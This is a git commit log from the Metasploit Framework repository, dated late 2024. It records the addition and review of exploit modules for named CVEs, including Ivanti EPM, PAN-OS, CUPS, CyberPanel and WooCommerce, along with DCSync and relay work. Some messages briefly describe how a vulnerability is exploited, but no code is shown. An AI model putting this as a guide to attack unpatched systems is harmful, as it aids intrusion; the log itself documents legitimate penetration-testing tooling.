adfoster-r7 d9d7f1a898 Merge pull request #19654 from h00die/strapi
strapi 3.0.0 beta 17.4 password reset (CVE-2019-18818)
2024-11-21 12:35:30 +00:00
h00die 0f6da56a52 vcenter sudo module 2024-11-21 04:34:15 -05:00
Metasploit bc7adfbe41 Bump version of framework to 6.4.38 2024-11-21 03:32:51 -06:00
Ashley Donaldson 469671e59d Added LDAP password change module 2024-11-21 17:34:21 +11:00
h00die 4ff389762d xspy updates 2024-11-20 19:35:19 -05:00
jenkins-metasploit 3419bfec43 automatic module_metadata_base.json update 2024-11-20 22:41:34 +00:00
jheysel-r7 afbbba09e8 Land #19584 Judge0 sandbox escape CVE-2024-28185, CVE-2024-28189 2024-11-20 14:35:38 -08:00
Takah1ro da6f8cd552 Add Judge0 module and document 2024-11-20 14:15:38 -08:00
Ashley Donaldson 1a20bed286 Option description fix 2024-11-21 07:48:53 +11:00
jenkins-metasploit d69c146fb0 automatic module_metadata_base.json update 2024-11-20 19:26:21 +00:00
jheysel-r7 05cbd1d9a3 Land #19593 Add exploit for CVE-2023-28324 (Unauthenticated RCE in Ivanti EPM)
This exploits an unauthenticated RCE in Ivanti's EPM where a .NET remoting client can invoke a method that results in an OS command being executed in the context of NT AUTHORITY\SYSTEM.
2024-11-20 11:18:58 -08:00
Spencer McIntyre e52edf447c Implement feedback from the PR 2024-11-20 13:51:39 -05:00
Ashley Donaldson 4766976463 Removed executable status 2024-11-20 17:06:53 +11:00
Ashley Donaldson cec793f8f5 Msftidy changes 2024-11-20 16:09:21 +11:00
Ashley Donaldson afc735f4a4 Add documentation 2024-11-20 15:36:36 +11:00
Ashley Donaldson 1ca32eea7e Implement Reset NTLM behaviour. 2024-11-20 15:00:56 +11:00
Ashley Donaldson 8158cf5bae Add Reset and Change_NTLM actions 2024-11-20 12:13:41 +11:00
sfewer-r7 2469d4ea23 add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00
adfoster-r7 e6615d3a74 Merge pull request #19659 from sjanusz-r7/fix-irb-deadlock-error
Fix IRB deadlock recursive locking on Ctrl+C
2024-11-19 16:11:09 +00:00
jenkins-metasploit 1d7e6050d3 automatic module_metadata_base.json update 2024-11-19 16:05:05 +00:00
Spencer McIntyre f7e210d3e9 Merge pull request #19624 from cdelafuente-r7/fix/mod/ms_icpr
Fix a crash when generating CSRs with OpenSSL 3.4.0
2024-11-19 10:58:52 -05:00
bwatters-r7 441a3215b2 Catch up to head on other branch 2024-11-19 08:59:22 -06:00
adfoster-r7 09db1811f1 Merge pull request #19662 from sjanusz-r7/fix-no-readline-crash
Load Readline without a conditional
2024-11-19 13:25:41 +00:00
sjanusz-r7 523a172e23 Load Readline without a conditional 2024-11-19 13:02:06 +00:00
adfoster-r7 e199dd7ca7 Merge pull request #19657 from sjanusz-r7/deprecate-real-readline
Deprecate real-readline option
2024-11-19 12:50:15 +00:00
sjanusz-r7 fefc8438f5 Deprecate real-readline option 2024-11-19 12:38:05 +00:00
Ashley Donaldson 479078a5f2 Adding changing/resetting password module 2024-11-19 17:44:59 +11:00
h00die 6bd049e346 operator working 2024-11-18 20:09:13 -05:00
gardnerapp 19770cf870 Remove unneeded file and rudocop corrections
Update modules/exploits/linux/local/gameoverlay_privesc.rb

Co-authored-by: Brendan <bwatters@rapid7.com>

Give bwatters7 credit, add docs

Experiment with randomized bash copy and Rex::File.join

remove unused line

Add missing parenthesis

fix problem with bash copy

Remove rex::join, call proper method for generating payload

add exploit::exe mixin, bash copy randomization

Rubocop changes

Remove nc
2024-11-18 17:01:08 -06:00
gardnerapp 6e09722f67 Rubocop changes and arch tracking for payload
Update modules/exploits/linux/local/gameoverlay_privesc.rb

Co-authored-by: Brendan <bwatters@rapid7.com>

Rubocop changes
2024-11-18 16:59:37 -06:00
gardnerapp c6425f7245 Break out command building to make it easier to read
Update modules/exploits/linux/local/gameoverlay_privesc.rb

Co-authored-by: Brendan <bwatters@rapid7.com>
2024-11-18 16:58:56 -06:00
gardnerapp e506c34e13 Update modules/exploits/linux/local/gameoverlay_privesc.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-11-18 16:57:17 -06:00
gardnerapp 883a0f8985 Update modules/exploits/linux/local/gameoverlay_privesc.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-11-18 16:57:17 -06:00
gardnerapp 51194ad0c9 Rebase and maintain authorship
Rebase and change payload delivery

Rebase and remove cmdstager
Update modules/exploits/linux/local/game_overlay_privesc.rb

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>

remove CmdStager Mixin

Add PrependSetuid

Remove python from exploit

Remove generate_payload_exe and add dynamic directory to upper mount layer

Change where payload is dropped

Remove FileUtils module

Call proper method for generating payload

Seperate exploit and triggering of payload

Seperate exploit and triggering payload

test
2024-11-18 16:55:59 -06:00
gardnerapp c927f22d66 Update modules/exploits/linux/local/game_overlay_privesc.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-11-18 16:44:33 -06:00
Corey 5edec2525f Rebase and Squash
init

Add moduel scaffolding

Add Opts, check and exploit methods

Rubocop changes

Add checks for vunerable kernel versions

Write check for distro type

Finish protoype of check add exploit

Make changes to check method

Add checkcode

Add x86 for payload compatability

remove check, add kernel version

add codenam, transform keys in vuln

Note

minor spelling change

Add description

Add cve references

Start trying to drop payloads on disk

Change description, include modules for file upload, use proper methods for writing payload

continue trying to upload

Use write_file instead of upload_and_chmodx

remove upload_dir opt

expirement w g1vi exploit

Include cmd_stage module, add generate_payload_exe, run payload in new namespace

Add missing call to setcap, fix description

Fix unterminated string, fix directory for calling python copy

Rubocop changes

Create dynamic payload

Add mkdir_p and WritableDir opts

Update modules/exploits/linux/local/game_overlay_privesc.rb

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>

Revert back to python exploit, add dynamic writable dir

Add todos

Remove FileUtils

Change module name

Add checkcodes

Add more checkcodes
2024-11-18 16:41:38 -06:00
Christophe De La Fuente 519c18a858 Update specs for auxiliary/admin/dcerpc/icpr_cert 2024-11-18 21:28:55 +01:00
Spencer McIntyre 96a7a3269e Make enum options case normalizing 2024-11-18 14:20:14 -05:00
jenkins-metasploit 2177fdadbd automatic module_metadata_base.json update 2024-11-18 16:32:34 +00:00
Christophe De La Fuente 7bab1c1980 Fix specs and add algorithm argument 2024-11-18 17:17:58 +01:00
adfoster-r7 1ed2d7e258 Merge pull request #19658 from cdelafuente-r7/fix/mod/get_ticket/file_read
Fix `auxiliary/admin/kerberos/get_ticket` issue on Windows
2024-11-18 16:08:27 +00:00
sjanusz-r7 bc45734fed Fix IRB deadlock recursive locking on Ctrl+C 2024-11-18 14:37:01 +00:00
jenkins-metasploit 26e424a921 automatic module_metadata_base.json update 2024-11-18 14:32:24 +00:00
Christophe De La Fuente 2970c99471 Use binread instead 2024-11-18 15:32:08 +01:00
Spencer McIntyre dd7e1786e1 Merge pull request #19643 from smashery/dcsync_individual
DCsync individual accounts and groups
2024-11-18 09:25:21 -05:00
Christophe De La Fuente 7c512b7054 Read the certificate in binary mode 2024-11-18 15:11:36 +01:00
h00die f38661d6c3 pod user working 2024-11-18 07:30:21 -05:00
sfewer-r7 4856817131 fix a typo 2024-11-18 09:44:53 +00:00
Ashley Donaldson 20b8fc61a8 Updated ruby_smb module with SAMR group membership query ability 2024-11-18 10:08:00 +11:00
sjanusz-r7 358e79bd3c Handle SSH errors by closing the session 2024-11-17 14:53:42 +00:00
sjanusz-r7 f6a51610ad Add handle_error to command_stream 2024-11-17 14:25:22 +00:00
h00die dfebca457c strapi review 2024-11-16 15:47:54 -05:00
h00die 219981227d Update documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-11-16 15:36:00 -05:00
h00die 6629d5dff2 strapi password reset 2024-11-15 15:12:34 -05:00
sfewer-r7 c58dbbfb61 add in documentation 2024-11-15 17:42:57 +00:00
sfewer-r7 feb1ac79da add in a suitable certificate and private key to use by default. 2024-11-15 17:41:31 +00:00
jenkins-metasploit acc9940cdb automatic module_metadata_base.json update 2024-11-15 14:30:41 +00:00
Spencer McIntyre 5d9add4450 Merge pull request #19640 from jheysel-r7/pyload_js2py_cve_2024_39205
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
2024-11-15 09:24:37 -05:00
jenkins-metasploit 786e8551ee automatic module_metadata_base.json update 2024-11-15 12:55:28 +00:00
adfoster-r7 d039bead93 Merge pull request #19601 from sjanusz-r7/add-teamcity-login-scanner
Add JetBrains TeamCity HTTP Login Scanner
2024-11-15 12:49:10 +00:00
sfewer-r7 e520ca7ee9 comment the intent of this code block 2024-11-15 12:29:31 +00:00
sfewer-r7 2ec5778405 get_cert_subject_item may return nil, so test for that here 2024-11-15 12:28:25 +00:00
sfewer-r7 51ad7ad0bf improve the send_packet logic to fail gracefully if bad data is recieved 2024-11-15 12:27:33 +00:00
Heyder Andrade 0f969f1dd6 Clean-up 2024-11-15 11:53:59 +01:00
sfewer-r7 c3bd4792ec rename SSLClientCert and SSLClientKey to ClientCert and ClientKey. This then matcheds up with ClientSerialNumber and ClientPlatform, which is clearer IMHO. Also, we explicitly create a Rex TCP socket, so these param names no longer collide with what a mixin would use 2024-11-15 09:44:50 +00:00
sfewer-r7 6eb15d5b66 add a helper method get_cert_subject_item 2024-11-15 09:42:59 +00:00
sfewer-r7 91587ce30b this message can be on a single line 2024-11-15 09:42:06 +00:00
sfewer-r7 e89c27fa3b fix some typos. Make msftidy happy. Add comments to the external references. 2024-11-15 08:54:32 +00:00
Arne De Herdt de39b693b7 Merge pull request #19645 from adeherdt-r7/MS-9862-rails-upgrade-preparation-migration-manager
MS-9862 Ruby on Rails Upgrade Preparation : Migration
2024-11-15 08:44:05 +01:00
Ashley Donaldson 9bd27e431d Give specific version details when the version matches perfectly 2024-11-15 14:54:57 +11:00
Ashley Donaldson 717940590a Clearer datastore option description 2024-11-15 11:11:41 +11:00
dwelch-r7 9409749a21 Land #19650, Fix crash when using modules 2024-11-14 21:26:46 +00:00
adfoster-r7 6be0182b1f Fix crash when using modules 2024-11-14 21:19:41 +00:00
Jack Heysel 92e42a63ea Rubocop 2024-11-14 12:47:35 -08:00
Jack Heysel 4e1f33336c Ofuscation and Gemfile update 2024-11-14 12:44:19 -08:00
h00die 6962d828ac primefaces exploit v2 2024-11-14 14:14:02 -05:00
h00die 7a8e72f9b8 primefaces exploit v1 2024-11-14 14:12:13 -05:00
sfewer-r7 47f924bb8f add in the initial work on the FortiManager exploit. 2024-11-14 18:53:12 +00:00
Jack Heysel 526451fed5 Responded to comments 2024-11-14 10:46:11 -08:00
Spencer McIntyre d2ee472e31 Merge pull request #19185 from dwelch-r7/display-current-action-on-module-load
Display current action on module load
2024-11-14 12:49:57 -05:00
Heyder Andrade 09d84eaabb Added module for WSO2 API Manager Documentation File Upload Remote Code Execution
Closes #19646

on-behalf-of: @redwaysecurity <info@redwaysecurity.com>
2024-11-14 18:34:11 +01:00
Arne De Herdt b80bd252a8 MS-9862 Ruby on Rails Upgrade Preparation : Migration
Updating the logic in the `Msf::DbManager::Migration` to adhere to modern Rails standards and no longer manually control the connection. The connection pool and handling is fully controlled by ActiveRecord, which has a better understanding of what needs to be done than we do.
2024-11-14 11:37:54 +01:00
adfoster-r7 4c659ed13d Merge pull request #19644 from adeherdt-r7/MS-9682-rails-upgrade-preparation-workflows
MS-9682 Rails Upgrade Preparation: Workflows
2024-11-14 10:06:41 +00:00
Arne De Herdt fe4d5aff74 MS-9682 Rails Upgrade Preparation: Workflows
Updating the workflows to accommodate the required changes for the Ruby on Rails 7.1 upgrade.
This increases the timeout settings and changes the healthcheck command to properly use the correct account and reduce the noise level in the logs.
2024-11-14 09:39:19 +01:00
Ashley Donaldson 715fa3c559 Msftidy fixes 2024-11-14 17:58:00 +11:00
Ashley Donaldson 3e3e81ff22 Update documentation with new datastore options 2024-11-14 15:15:06 +11:00
Ashley Donaldson 67c33fa95f Fix bug: DCSync only once, rather than once per DC that exists in the domain
- Also only DCSync each user once (if they're specified multiple times in KRB_USERS)
- Also be resilient to spaces in the comma-sepration
2024-11-14 15:13:59 +11:00
Jack Heysel 2ba8a6c08d Responded to comments 2024-11-13 17:23:08 -08:00
Metasploit 67e27c60ef Bump version of framework to 6.4.37 2024-11-13 18:39:19 -06:00
Jack Heysel 497ce5e9da Linting and Rex::RandomIdentifier update 2024-11-13 08:28:52 -08:00
jenkins-metasploit ec8778b4c9 automatic module_metadata_base.json update 2024-11-13 15:58:04 +00:00
adfoster-r7 2a022b8215 Merge pull request #19635 from adfoster-r7/update-kerberos-enumusers-description
Update Kerberos enumusers description
2024-11-13 15:50:53 +00:00
adfoster-r7 5e5a5ce0a1 Merge pull request #19634 from adfoster-r7/update-readme-file
Update README file
2024-11-13 15:26:10 +00:00
Dean Welch 0d0631aa2a Squash to a single line of output 2024-11-13 11:27:17 +00:00
Ashley Donaldson 1705203ad8 Support DCSyncing by group too 2024-11-13 17:22:11 +11:00
h4x-x0r 37c148cc7c CVE-2024-47407
CVE-2024-47407
2024-11-13 03:55:17 +00:00
h4x-x0r afdddf2e43 updated 2024-11-13 03:40:22 +00:00
Jack Heysel d2ef3cb6a9 Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397) 2024-11-12 16:05:07 -08:00
Metasploit 93fab6c26b automatic module_metadata_base.json update 2024-11-12 17:19:17 -06:00
Brendan 19e182ce65 Land #19557, Add Palo Alto Expedition RCE (CVE-2024-5910 & CVE-2024-9464) Module
Palo Alto Expedition RCE (CVE-2024-5910 & CVE-2024-9464) Module
2024-11-12 16:42:06 -06:00
Christophe De La Fuente 24e19e4ebb Update the ESC8 relay module to use the new helper
It also fixes some unrelated minor issues found in the module and the documentation
2024-11-12 18:23:31 +01:00
Dean Welch 2c009d02f9 place current action display behind feature flag 2024-11-12 15:53:30 +00:00
Dean Welch 6018adbbb3 Display current action and number of available actions on module use 2024-11-12 15:53:30 +00:00
h4x-x0r 6f6f92823a fixed typo
fixed typo
2024-11-12 15:15:15 +00:00
h4x-x0r a09ca39dee Update documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-11-12 09:03:51 -06:00
h4x-x0r 61486cd877 Update documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-11-12 09:03:35 -06:00
h4x-x0r fb102ec409 Update modules/exploits/linux/http/paloalto_expedition_rce.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-11-12 09:03:22 -06:00
adfoster-r7 ffa12f6ba5 Update Kerberos enumusers description 2024-11-12 13:45:47 +00:00
adfoster-r7 a52a22f922 Update README file 2024-11-12 13:35:37 +00:00
Christophe De La Fuente 35bb832b7c Add create_csr helper under Rex::Proto
Also update `ms_icpr.rb` to use it
2024-11-12 12:34:20 +01:00
Christophe De La Fuente 422ecd8d3f Remove setting version for CSR 2024-11-12 12:34:20 +01:00
Ashley Donaldson 6c3e13a31f Able to query just a subset of users 2024-11-12 17:04:40 +11:00
h4x-x0r a80006933a Merge pull request #2 from bwatters-r7/collab/pr/19557
Stage cmd payloads to a file before executing
2024-11-11 21:20:35 -06:00
Ashley Donaldson d396d06e35 Enable adding Users, not just computers (if permissions allow)
Also added extra error handling for when password is wrong or expired
2024-11-12 12:33:29 +11:00
h00die 4ebc6f1ff1 peer review 2024-11-11 17:37:33 -05:00
h00die 594c3a82ea peer review 2024-11-11 17:32:49 -05:00
remmons-r7 4951a9b24d Create mDNS server.rb 2024-11-11 15:54:44 -06:00
remmons-r7 b712f9a745 Create cups_ipp_remote_code_execution.md 2024-11-11 15:53:14 -06:00
remmons-r7 720312ba1c Create cups_ipp_remote_code_execution.rb 2024-11-11 15:51:09 -06:00
bwatters-r7 03928a56bd Add staging file delete and code cleanup 2024-11-11 14:42:19 -06:00
Jack Heysel 27459bb10f Updated docs 2024-11-11 12:40:56 -08:00
Jack Heysel 3068511b66 CVE-2023:4220: Chamilo v1.11.24 Unrestricted File Upload 2024-11-11 11:33:34 -08:00
adfoster-r7 88132657d2 Merge pull request #19628 from adfoster-r7/update-readme-steps
Update README
2024-11-11 17:07:53 +00:00
adfoster-r7 5c256798e3 Update README 2024-11-11 16:58:51 +00:00
adfoster-r7 cc92e62573 Merge pull request #19627 from adfoster-r7/update-readme
Update readme
2024-11-11 16:50:59 +00:00
adfoster-r7 c83c258221 Update readme 2024-11-11 16:30:39 +00:00
Spencer McIntyre f16991af07 Merge pull request #19623 from adfoster-r7/fix-kerberos-cache-storage-exception
Fix Kerberos cache storage exception
2024-11-11 09:31:13 -05:00
adfoster-r7 2206b0c288 Merge pull request #19617 from sjanusz-r7/fix-shell-include
Check for nil res when setting echo shell
2024-11-11 10:23:15 +00:00
Ashley Donaldson 8891c56211 Give likely Windows versions for SMB v2-3 2024-11-11 14:00:53 +11:00
bwatters-r7 0308f46f74 Stage cmd payloads to a file before executing 2024-11-08 19:27:58 -06:00
adfoster-r7 abfc24efdc Fix Kerberos cache storage exception 2024-11-08 11:25:28 +00:00
vultza 39243fc52f minor fixes 2024-11-07 22:37:47 +00:00
Spencer McIntyre 03dc2317da Merge pull request #19369 from Adithya2357/readme-update
Update README.md
2024-11-07 14:46:06 -05:00
adfoster-r7 3ccf18f8e9 Merge pull request #19610 from cgranleese-r7/fixes-report-summary
Updates report summary mixin with an additional fallback when finding creds
2024-11-07 19:24:40 +00:00
soroshsabz f56a6d693d Update Setting-Up-a-Metasploit-Development-Environment.md 2024-11-07 18:24:21 +03:30
soroshsabz 80067379a5 Update Setting-Up-a-Metasploit-Development-Environment.md 2024-11-07 18:22:37 +03:30
soroshsabz b55903a75f Update Setting-Up-a-Metasploit-Development-Environment.md 2024-11-07 18:06:44 +03:30
soroshsabz 51dda15b78 Update Setting-Up-a-Metasploit-Development-Environment.md 2024-11-07 17:54:37 +03:30
Spencer McIntyre c98830834b Merge pull request #19620 from dudu7615/Fixed-spelling-errors-in-command-usage
Fixed spelling errors in command usage
2024-11-07 09:14:32 -05:00
soroshsabz c0fbba25f4 Update Setting-Up-a-Metasploit-Development-Environment.md
Add PowerShell based installation instructions
2024-11-07 16:48:02 +03:30
Metasploit 763793ee3d Bump version of framework to 6.4.36 2024-11-07 03:35:44 -06:00
Jack Heysel 81b83f2fd6 Updated docs and check 2024-11-06 09:13:51 -08:00
cgranleese-r7 96f6f66429 Land #19550, Fix username/password generation in case both PASSWORD_SPRAY and USER_AS_PASS are enabled 2024-11-06 13:56:05 +00:00
dudu 8ffa333a97 Fixed spelling errors in command usage 2024-11-06 20:38:51 +08:00
adfoster-r7 c27c943e40 Merge pull request #19619 from smashery/krb-etype-cache-regression
Fix out of scope variable with original behaviour
2024-11-06 11:25:48 +00:00
Ashley Donaldson 2470a45eb1 Fix out of scope variable with original behaviour 2024-11-06 18:33:34 +11:00
Jack Heysel 10cd8d1020 Removed unnecessary code from exploit.cpp 2024-11-05 15:47:52 -08:00
Jack Heysel 5bc3e046eb Update check 2024-11-05 15:34:25 -08:00
Jack Heysel 7a5bc60aab Windows Access Mode Mismatch LPE in ks.sys [CVE-2024-35250] 2024-11-05 15:31:44 -08:00
Metasploit c250f8dfe1 automatic module_metadata_base.json update 2024-11-05 13:30:50 -06:00
Spencer McIntyre e709a18128 Merge pull request #19404 from bwatters-r7/smb2http_relay
SMB to NTLM HTTP Relay with ESC8 module
2024-11-05 14:12:08 -05:00
sjanusz-r7 975c1ac71f Check for nil res when setting echo shell 2024-11-05 13:31:07 +00:00
vultza 1348275ff7 fix lax check 2024-11-04 23:07:32 +00:00
h00die 0de93eedb7 asterisk ami auth rce 2024-11-04 16:27:58 -05:00
h00die 773355f0e8 making bcenter lpe progress 2024-11-04 16:26:08 -05:00
bwatters-r7 be21e2d4c6 Switch print to call out available templates 2024-11-04 13:37:23 -06:00
Brendan 096e86cdaa Merge pull request #5 from zeroSteiner/pr/collab/19404
Pr/collab/19404
2024-11-04 12:39:00 -06:00
sjanusz-r7 68ec0c82f1 TeamCity: Lint 2024-11-04 16:58:32 +00:00
cgranleese-r7 145ab02f0c Land #19573, Update to Ruby 3.2 2024-11-04 16:37:29 +00:00
sjanusz-r7 520ac7ef2b TeamCity: Correctly encrypt UTF-8 codepoints 2024-11-04 16:33:29 +00:00
sjanusz-r7 2073121f5e TeamCity: Raise ArgumentError, refactor Crypto as an included module 2024-11-04 16:33:29 +00:00
sjanusz-r7 f82483ba1e TeamCity: Initial TeamCity Crypto tests 2024-11-04 16:33:29 +00:00
sjanusz-r7 970beb4c27 TeamCity: Consolidate RSA crypto into login scanner 2024-11-04 16:33:29 +00:00
sjanusz-r7 a6ee189502 TeamCity: Use more exceptions, cache public key 2024-11-04 16:33:29 +00:00
sjanusz-r7 386441d3d2 TeamCity: Consolidate HTTP TeamCity into module 2024-11-04 16:33:29 +00:00
sjanusz-r7 c37f4e6508 TeamCity: Prevent endless recursion and stack explosions in try_login 2024-11-04 16:33:29 +00:00
sjanusz-r7 ed1a5d97c3 TeamCity: use vars_post for login request 2024-11-04 16:33:29 +00:00
sjanusz-r7 84cacb5cca TeamCity: Fire and forget logout request 2024-11-04 16:33:28 +00:00
sjanusz-r7 ef51254fcd TeamCity: Add maximum message size for string 2024-11-04 16:33:28 +00:00
sjanusz-r7 7c1692cb84 TeamCity: Modify authors 2024-11-04 16:33:28 +00:00
sjanusz-r7 9cb05efa27 TeamCity: use random padding bytes 2024-11-04 16:33:28 +00:00
sjanusz-r7 cba8962d29 Add JetBrains TeamCity HTTP Login Scanner 2024-11-04 16:33:28 +00:00
adfoster-r7 69dabe6817 Update to Ruby 3.2 2024-11-04 16:08:01 +00:00
vultza c9e0668473 fixed double project name validation issue 2024-11-04 16:01:06 +00:00
vultza 3a90648c7a update validation function and fix typo 2024-11-04 15:55:45 +00:00
Spencer McIntyre e130092d87 Add a missing require statement 2024-11-04 09:37:12 -05:00
Spencer McIntyre 006ed90f1c Move the ESC8 module and document the attack 2024-11-04 09:37:12 -05:00
Spencer McIntyre 7d8baee574 Add some error handling and more logging 2024-11-04 09:37:12 -05:00
Spencer McIntyre 80d883b55e Consistently use strings for HTTP request options 2024-11-04 09:37:12 -05:00
Spencer McIntyre 4a4ec9aea4 Add some more logging 2024-11-04 09:37:12 -05:00
Spencer McIntyre 316a967414 Update the ESC8 module for the new changes 2024-11-04 09:37:08 -05:00
h00die 5d2bc4aa3c add vcenter server appliance to ssh platform 2024-11-03 14:47:40 -05:00
h00die 8ba4332c33 Merge remote-tracking branch 'upstream/master' into vcenter_privesc 2024-11-03 13:56:14 -05:00
h00die 2b593bcf54 wp_post_smtp_acct_takeover peer review 2024-11-03 13:52:55 -05:00
vultza a74e1678d9 fix path normalization and missing comma 2024-11-02 15:10:15 +00:00
vultza 8f2f0c7b37 typo on documentation 2024-11-02 15:08:37 +00:00
vultza f0abc0da69 Add documentation 2024-11-02 00:47:32 +00:00
vultza 1e6bfb2af8 Add CVE-2024-45309 2024-11-02 00:47:15 +00:00
h00die 9cba5dad59 WIP for asterisk rce 2024-11-01 16:28:45 -04:00
adfoster-r7 f40e98616c Merge pull request #19612 from rapid7/revert-19554-new-junction-test
Revert "Added new failing test for windows junction points"
2024-11-01 17:36:51 +00:00
adfoster-r7 9485cdd9a6 Revert "Added new failing test for windows junction points" 2024-11-01 17:19:39 +00:00
Valentin Lobstein c1c9f6f7bb Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-11-01 17:23:45 +01:00
Valentin Lobstein 5464e8c009 Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-11-01 17:23:35 +01:00
Spencer McIntyre d9b3528d89 Merge pull request #19554 from smashery/new-junction-test
Added new tests for Windows junction points
2024-11-01 11:54:00 -04:00
Metasploit 1634cdc5cc automatic module_metadata_base.json update 2024-11-01 10:29:21 -05:00
cgranleese-r7 dc6cb34a21 Updates report summary mixin to have additional fallback when looking for creds 2024-11-01 15:27:31 +00:00
Spencer McIntyre 3b0195918c Merge pull request #19529 from NtAlexio2/pipe_dcerpc_auditor_rport
Allow settings the RPORT option for pipe_dcerpc_auditor
2024-11-01 11:11:45 -04:00
Valentin Lobstein 3e7aca2584 Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-11-01 15:46:26 +01:00
Valentin Lobstein 12abb50813 Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-11-01 15:46:14 +01:00
Valentin Lobstein f85de40d58 Update documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-11-01 15:46:05 +01:00
Graeme Robinson f209316239 Update werkzeug_debug_rce.rb
Use percent strings for module description
2024-11-01 14:24:31 +00:00
Metasploit ca9d0558f9 automatic module_metadata_base.json update 2024-11-01 06:29:40 -05:00
dwelch-r7 1bfa0755a8 Land #19518, Add support for RISC-V 32-bit / 64-bit Little Endian payloads 2024-11-01 11:18:30 +00:00
Chocapikk db8c0461b8 Remove timeout 2024-11-01 08:55:32 +01:00
Chocapikk 3723064ac9 Fix typo 2024-11-01 08:53:55 +01:00
Chocapikk 695feaa37e Update comment 2024-11-01 08:50:04 +01:00
Chocapikk 616ffe7d18 Add CVE-2024-51568 2024-11-01 08:48:34 +01:00
Chocapikk cdd3ef9bc5 Update description 2024-10-31 22:21:43 +01:00
Chocapikk 42980c235d Update refs 2024-10-31 22:19:19 +01:00
Chocapikk 4269615400 Add CyberPanel Pre-Auth RCE Exploit Module for CVE-2024-51378 and CVE-2024-51567 2024-10-31 22:13:05 +01:00
Metasploit 9e0b0f565f automatic module_metadata_base.json update 2024-10-31 15:34:25 -05:00
Brendan ff521464f3 Land #19528, Add Python exec payload
Add a python/exec payload to execute OS commands
2024-10-31 15:23:25 -05:00
Metasploit 4a59d3db34 automatic module_metadata_base.json update 2024-10-31 11:42:23 -05:00
jheysel-r7 ea45d83562 Land #19499, Adds SolarWinds Help Desk Backdoor module
This adds a new module which exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 which enables attackers to retrieve all tickets currently logged in the application.
2024-10-31 12:17:32 -04:00
jheysel-r7 2e8892cb01 Land #19517, Add WooCommerce SQLi module
This adds a new auxiliary module that exploits an unauthenticated SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress (versions <= 2.8.2). The vulnerability allows attackers to execute SQL queries via the order parameter which can be used to dump usernames and their hashed passwords.
2024-10-31 12:09:55 -04:00
Jack Heysel 3456293da5 Lint 2024-10-31 11:56:55 -04:00
jheysel-r7 f01b01a62c Update modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb 2024-10-31 11:36:19 -04:00
Spencer McIntyre 5550e073dd Implement suggested changes 2024-10-31 11:29:34 -04:00
jheysel-r7 f24c0148f8 Update modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb 2024-10-31 10:56:56 -04:00
Metasploit ec013f2a73 Bump version of framework to 6.4.35 2024-10-31 09:14:41 -05:00
dwelch-r7 8b0acd2982 Land #19602, Update build cache to run xargs in parallel 2024-10-31 13:46:08 +00:00
Metasploit 04dd01498d automatic module_metadata_base.json update 2024-10-31 08:43:40 -05:00
adfoster-r7 02f5fd77be Update build cache to run xargs in parallel 2024-10-31 13:21:45 +00:00
cgranleese-r7 493a52bbcf Land #19607, Fix table width bug when running from docker 2024-10-31 13:16:15 +00:00
adfoster-r7 732e2df18a Fix table width bug when running from docker 2024-10-31 12:44:49 +00:00
adfoster-r7 afbf9af930 Merge pull request #19600 from adfoster-r7/mark-enum-chrome-as-superseded
Mark older browser modules for windows as superceded
2024-10-31 11:33:03 +00:00
dwelch-r7 58e69473f8 Land #19603, Update puma and dependencies 2024-10-31 10:20:45 +00:00
adfoster-r7 825e557269 Update puma and dependencies 2024-10-30 22:41:00 +00:00
h4x-x0r c34d20db68 updated
updated
2024-10-30 21:51:32 +00:00
Brendan 3fa31c8717 Land #19604, bump payloads to 2.0.187
Bump payloads Gem to 2.0.187
2024-10-30 16:37:31 -05:00
bwatters-r7 a2e97b3e38 Update payload cache sizes for... some reason. 2024-10-30 16:19:59 -05:00
bwatters-r7 da21cecf1f Bump payloads Gem to 2.0.187 2024-10-30 15:45:55 -05:00
jheysel-r7 222df0bfdf Land #19527 Add bypass for GiveWP RCE (CVE-2024-8353)
This updates the exploit module wp_giveup_rce_bypass to incorporate the bypass CVE, allowing the payload to work on all affected versions of the GiveWP plugin.
2024-10-30 16:29:14 -04:00
Jack Heysel f643aee5a4 Lint 2024-10-30 16:17:36 -04:00
jheysel-r7 9c0dc56aa6 Update modules/exploits/multi/http/wp_givewp_rce.rb 2024-10-30 16:04:28 -04:00
h00die 65efd07935 docs for wp_post_smtp 2024-10-30 15:38:46 -04:00
adfoster-r7 5e217fb93a Mark enum_chrome as superceded 2024-10-30 16:21:05 +00:00
adfoster-r7 7b745b2dcb Merge pull request #19506 from xaitax/enum_browsers
Add Browser Data Extraction for Chromium- and Gecko-based Browsers
2024-10-30 15:30:56 +00:00
h00die-gr3y 7e30647d71 small update 2024-10-30 15:12:41 +00:00
adfoster-r7 1bee048f85 Merge pull request #19597 from zeroSteiner/fix/bump-payloads/2.0.186
Update metasploit-payloads gem to 2.0.186
